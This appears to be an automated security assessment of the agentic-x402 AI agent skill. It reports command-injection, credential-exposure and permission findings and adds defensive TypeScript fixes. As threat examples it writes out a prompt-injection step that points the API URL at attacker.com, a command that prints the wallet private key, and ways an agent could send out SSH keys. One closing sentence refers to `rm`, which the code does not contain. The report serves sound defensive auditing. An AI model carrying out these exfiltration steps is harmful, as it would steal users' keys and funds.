Trust Assessment
agentic-x402 received a trust score of 58/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 6 findings: 2 critical, 3 high, 1 medium, and 0 low severity. The key findings are two command-injection paths through `child_process.spawn` (`bin/x402.js` and `bin/cli.ts`), an EVM private key kept in an agent-readable file, an API key sent to a user-configurable URL, over-broad `Bash` and `Read` permissions, and an unpinned npm dependency.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 0/100; five of the six findings, including both critical ones, come from that layer.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (6)
| Severity | Finding | Remediation | Layer | Location |
|---|---|---|---|---|
| CRITICAL | Command injection via unsanitized arguments to a spawned process. The `x402` CLI wrapper (`bin/x402.js`) calls `child_process.spawn` to run `npx tsx`, passing user-supplied arguments (`process.argv.slice(2)`) straight through. If that spawn goes through a shell (`shell: true`, or a single command string), metacharacters in an argument (`;`, `&&`, a pipe, backticks, `$( )`) are interpreted and whoever controls an argument runs arbitrary commands. The declared permission `Bash(x402:*)` lets the agent invoke `x402` with any arguments, so a prompt-injected agent can supply them. Caveat: with the default `shell: false` and an argument array, Node passes each element as one literal `argv` entry and no shell parsing happens. On Windows, however, `npx` is a `.cmd` batch shim that current Node versions will only spawn with `shell: true`, so that platform is where the shell-interpreted path is most likely. Confirm which mode the wrapper uses before rating this as exploitable. | Keep `shell: false` (the default) and pass arguments as an array; never build a command string from user input. Dispatch only to an allowlist of known subcommands and validate the remaining arguments against the shape each subcommand expects. Where a shell is unavoidable, escape for that specific shell (cmd.exe and sh quote differently) or, better, avoid the `.cmd` shim by resolving the `tsx` JavaScript entry point and running it under `process.execPath`. Escaping `process.argv.slice(2)` while keeping `shell: true` is the weakest option and easy to get wrong. | LLM | bin/x402.js:30 |
| CRITICAL | Command injection via unsanitized arguments to a spawned process (cli.ts). The command dispatcher `bin/cli.ts` also calls `child_process.spawn` to run `npx tsx` with `commandArgs` derived from user input, giving a second injection point under the same conditions and with the same `Bash(x402:*)` exposure as the `bin/x402.js` finding. The same caveat applies: this is shell injection only if the spawn is shell-interpreted. | Treat `commandArgs` as literal arguments: `shell: false`, array form, subcommand allowlist. If shell interpretation is genuinely required, use a proven escaping routine for the target shell rather than ad hoc string replacement. | LLM | bin/cli.ts:109 |
| HIGH | Credential harvesting: EVM private key stored in an agent-readable file. `SKILL.md` instructs the agent to store `EVM_PRIVATE_KEY` in `~/.x402/.env`, and `scripts/commands/setup.ts` implements that. `chmod 600` is applied, but the agent holds the `Read` permission, and `SKILL.md` even shows a command to display the key (`cat ~/.x402/.env \| grep EVM_PRIVATE_KEY`). A compromised agent or a malicious prompt can read the file and exfiltrate the key with the skill's own network capabilities, for example via `x402 fetch` to an attacker-controlled URL or by embedding it in a `create-link` request. A leaked EVM private key gives its holder full control of the wallet's funds. | Do not keep signing keys in files the agent can read, even with restricted modes; use a KMS, an OS keychain, or a signer process that exposes only a signing operation. If file storage is unavoidable, sandbox the agent's filesystem and restrict its network egress to trusted endpoints. Scope `Read` to the specific files the skill needs, and remove the `cat ... grep` example from `SKILL.md`. | LLM | SKILL.md:200 |
| HIGH | Data exfiltration: `X402_LINKS_API_KEY` sent to a configurable URL. `scripts/commands/create-link.ts` sends `X402_LINKS_API_KEY` in an `X-API-Key` header to `X402_LINKS_API_URL`; both values come from environment variables or `.env` files. An attacker who can influence the environment (for instance a prompt injection that gets the agent to run `export X402_LINKS_API_URL=http://attacker.com`) and then trigger `x402 create-link` receives the API key on a server they control, and the request body gives the same channel for any other data the agent can read. | Validate `X402_LINKS_API_URL` before attaching credentials: parse it with the `URL` class, require `https:`, and compare the parsed hostname exactly against an allowlist of trusted hosts (substring or suffix matching is bypassable). Do not read the endpoint from a `.env` file the agent can modify. Prefer short-lived, scoped tokens over a long-lived API key in a header. | LLM | scripts/commands/create-link.ts:120 |
| HIGH | Excessive permissions: broad Bash and Read access. The skill declares `Bash(x402:*)`, `Bash(npm:*)`, and `Read`. `Bash(x402:*)` is what makes the command-injection findings reachable by the agent. `Bash(npm:*)` allows any `npm` command, including `npm exec` for arbitrary command execution and `npm install` to pull in malicious packages. Unscoped `Read` covers every file the agent's user can read, which combined with `x402 fetch` or `x402 create-link` gives a direct exfiltration path for `/etc/passwd`, `~/.ssh/id_rsa`, cloud credentials, and similar. | Apply least privilege. Replace `Bash(x402:*)` with rules for the specific subcommands the skill needs (prefix rules such as `Bash(x402 fetch:*)`); drop `Bash(npm:*)` unless the agent truly must run `npm`, and if so allow only the specific commands required; scope `Read` to the directories or files the skill actually uses instead of global read access. | LLM | SKILL.md:1 |
| MEDIUM | Unpinned npm dependency version. `@x402/fetch` is declared with the caret range `^2.3.0`, so any later 2.x release is accepted at install time. | Pin the dependency to an exact version. Pinning in `package.json` alone does not fix transitive dependencies: commit `package-lock.json` and install with `npm ci` so every install resolves to the same tree, and review updates deliberately. | Dependencies | skills/ya7ya/agentic-x402/package.json |
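The two command-injection findings turn on whether `spawn` hands the argument array to a shell. The following TypeScript is an added example written for this report, not code from the agentic-x402 project: it runs the same attacker-style argument through a `shell: true` spawn and through the default argument-array spawn to show the difference, then sketches the dispatcher guard the remediation describes. `echo` stands in for `npx tsx`, the attacker argument is constructed, and the subcommand allowlist (`fetch`, `create-link`, `setup`, the subcommands this report mentions) is an assumption about the real CLI.

```typescript
import { spawnSync } from "node:child_process";

// Constructed attacker input: what a prompt-injected agent might pass as a
// single "argument" to `x402`. It is one argv element containing a shell separator.
export const MALICIOUS_ARG = "report.txt; echo INJECTED";

// Hypothetical allowlist (assumption): the subcommands this report names.
// The real CLI may expose others; add them here deliberately, not with "*".
const SUBCOMMANDS: ReadonlySet<string> = new Set(["fetch", "create-link", "setup"]);

// Vulnerable shape. With shell:true Node joins [command, ...args] into ONE
// string and runs `/bin/sh -c "<string>"`, so the ';' inside MALICIOUS_ARG ends
// the intended command and starts the attacker's. `echo` replaces `npx tsx`
// so the demonstration is harmless.
export function spawnThroughShell(userArgs: string[]): string {
  const r = spawnSync("echo", userArgs, { shell: true, encoding: "utf8" });
  return r.stdout;
}

// Hardened shape: default shell:false with an argument array. Each element
// becomes exactly one argv entry of the child; no shell ever parses it, so
// ';' is just a character in a filename.
export function spawnDirect(userArgs: string[]): string {
  const r = spawnSync("echo", userArgs, { shell: false, encoding: "utf8" });
  return r.stdout;
}

export type Dispatch =
  | { ok: true; sub: string; args: string[] }
  | { ok: false; reason: string };

// Dispatcher guard for bin/cli.ts-style code: allowlist the subcommand, then
// reject arguments carrying control characters or shell metacharacters.
// With shell:false the metacharacter filter is defense in depth (the spawn
// mode is the real fix); it also catches values that downstream code might
// later paste into a shell or a config file.
export function validateArgs(argv: string[]): Dispatch {
  const [sub, ...rest] = argv;
  if (!sub || !SUBCOMMANDS.has(sub)) {
    return { ok: false, reason: `unknown subcommand: ${String(sub)}` };
  }
  const bad = rest.find((a) => /[;&|`$<>\\\n\r\0]/.test(a));
  if (bad !== undefined) {
    return { ok: false, reason: `rejected argument: ${JSON.stringify(bad)}` };
  }
  return { ok: true, sub, args: rest };
}
```

Run it under Node on a POSIX system: the vulnerable function really does execute the injected `echo`, which is why the stand-in command is harmless. Note that `validateArgs` rejects `rm` outright rather than trying to sanitize it; an allowlist of subcommands is the part of this guard that does not depend on guessing every dangerous character.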
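For the `X402_LINKS_API_KEY` finding, the check a practitioner wants is an endpoint allowlist applied before the key is attached to any request. This is an added example, not the project's `create-link.ts`: the allowed host `links.x402.example` is a placeholder assumption because the report does not name the real API host, and the environment objects in the usage are constructed inputs.

```typescript
// Placeholder allowlist (assumption): the report does not name the real
// X402 Links API host, so a documentation-style hostname stands in for it.
export const ALLOWED_LINKS_HOSTS: ReadonlySet<string> = new Set(["links.x402.example"]);

export type LinksEnv = Record<string, string | undefined>;

function parseAbsoluteUrl(raw: string): URL {
  try {
    return new URL(raw);
  } catch {
    throw new Error(`X402_LINKS_API_URL is not a valid absolute URL: ${raw}`);
  }
}

// Parse and validate X402_LINKS_API_URL. Throws unless it is an https URL
// whose exact hostname is allowlisted and which carries no embedded credentials.
export function resolveLinksApiUrl(env: LinksEnv): URL {
  const raw = env.X402_LINKS_API_URL;
  if (!raw) throw new Error("X402_LINKS_API_URL is not set");
  const url = parseAbsoluteUrl(raw);
  // Plain http would expose the key to anyone on the network path.
  if (url.protocol !== "https:") {
    throw new Error(`X402_LINKS_API_URL must use https, got ${url.protocol}`);
  }
  // Exact hostname comparison. Substring or suffix checks are bypassed by
  // hosts like "links.x402.example.attacker.com". Userinfo tricks such as
  // "https://links.x402.example@attacker.com" also fail, because the parser
  // puts "attacker.com" in .hostname and the lookalike prefix in .username.
  if (!ALLOWED_LINKS_HOSTS.has(url.hostname)) {
    throw new Error(`X402_LINKS_API_URL host ${url.hostname} is not allowlisted`);
  }
  if (url.username || url.password) {
    throw new Error("X402_LINKS_API_URL must not embed credentials");
  }
  return url;
}

// Yes/no form of the same check for callers that only need a predicate.
export function isAllowedLinksApiUrl(raw: string | undefined): boolean {
  try {
    resolveLinksApiUrl({ X402_LINKS_API_URL: raw });
    return true;
  } catch {
    return false;
  }
}

export interface CreateLinkRequest {
  url: string;
  headers: Record<string, string>;
  body: string;
}

// Mirrors how create-link.ts is described (API key in an X-API-Key header),
// but the key is only read after the endpoint passed validation, so a bad URL
// never yields a request object that carries the secret.
export function buildCreateLinkRequest(env: LinksEnv, body: Record<string, unknown>): CreateLinkRequest {
  const url = resolveLinksApiUrl(env);
  const apiKey = env.X402_LINKS_API_KEY;
  if (!apiKey) throw new Error("X402_LINKS_API_KEY is not set");
  return {
    url: url.toString(),
    headers: { "Content-Type": "application/json", "X-API-Key": apiKey },
    body: JSON.stringify(body),
  };
}
```

The order inside `buildCreateLinkRequest` is the point: validation happens before the secret is even read from the environment, so there is no code path in which a rejected endpoint and the key coexist in one request.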
Full report: https://skillshield.io/report/42651ba2dfc2d576